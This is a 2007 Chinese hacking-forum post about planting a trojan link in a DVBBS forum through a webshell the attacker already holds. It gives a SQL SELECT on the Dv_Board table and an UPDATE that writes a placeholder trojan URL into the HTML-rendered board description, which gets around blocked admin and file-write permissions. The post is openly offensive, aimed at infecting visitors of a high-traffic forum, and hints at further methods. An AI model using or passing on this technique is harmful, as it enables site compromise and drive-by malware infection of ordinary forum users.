|
深度挖掘DVBBS钓鱼的可用性
樱木花盗 发表于 2007-3-24 14:45:08 |
条件:
(1):管理员在IIS里面禁止了你访问DVBBS的admin目录
(2):管理员禁止了修改目录文件
(3:)在目标服务器管理员未把你的SHELL全部删除
在这个条件似乎挂马钓鱼已经不可能,似乎大家都已经放弃了,但是,如果一个日访问量上10W的论坛在有手中,你还有SHELL,你会就这样放弃么,显然,不会···
LetsGo·············
经过研究,发现DVBBS的版快说名保存在如下表中:"[Dv_Board]"我们使用命令:
select*FROM[Dv_Board]可以查询到:readme=test2www.163.com
其实readme就是论坛版块的说明。那么我们只要把马挂在这里的话就可以了。因为他支持html语法。
这个也就是DVBBS的斑竹也可以挂马的原因。但是现在的管理员都聪明了,让斑竹都没有了这样的权限!
所以我们直接update数据库达到挂马的目的:
update[Dv_Board]setreadme=test2www.163.com木马连接地址whereid=1这样的话我们的马就挂上去了,这样你就可以在目录无权限,后台无权限登陆的时候把马挂到DVBBS的数据库······
其实这个仅仅只是开始,扩展的思路还需要大家继续去挖掘。
还有一个杀伤力更大的方法,这里我就不说了,对于高手来说,应该都可以想得到。
写到这里希望高手不要笑了,这样菜的方法,或许身为高手的你就没有想到!!
现在基本上已经没有前几年那么多的0day公布了,所以入侵最关键的慢慢由工具,转换成思路了!!
···············································
本文写的很简单,希望菜鸟们能明白······
入侵是要连锁反映的,我们也只要在连锁反映中才能学到更多的东西······
这就是一直以来我不直接告诉大家方法,而是只是提供一些思路给大家的原因。
我希望大家都能进步,而不是按照网上的教程你一步我一步的来操作,一点意义都没有·········· |
|
发表评论:
|
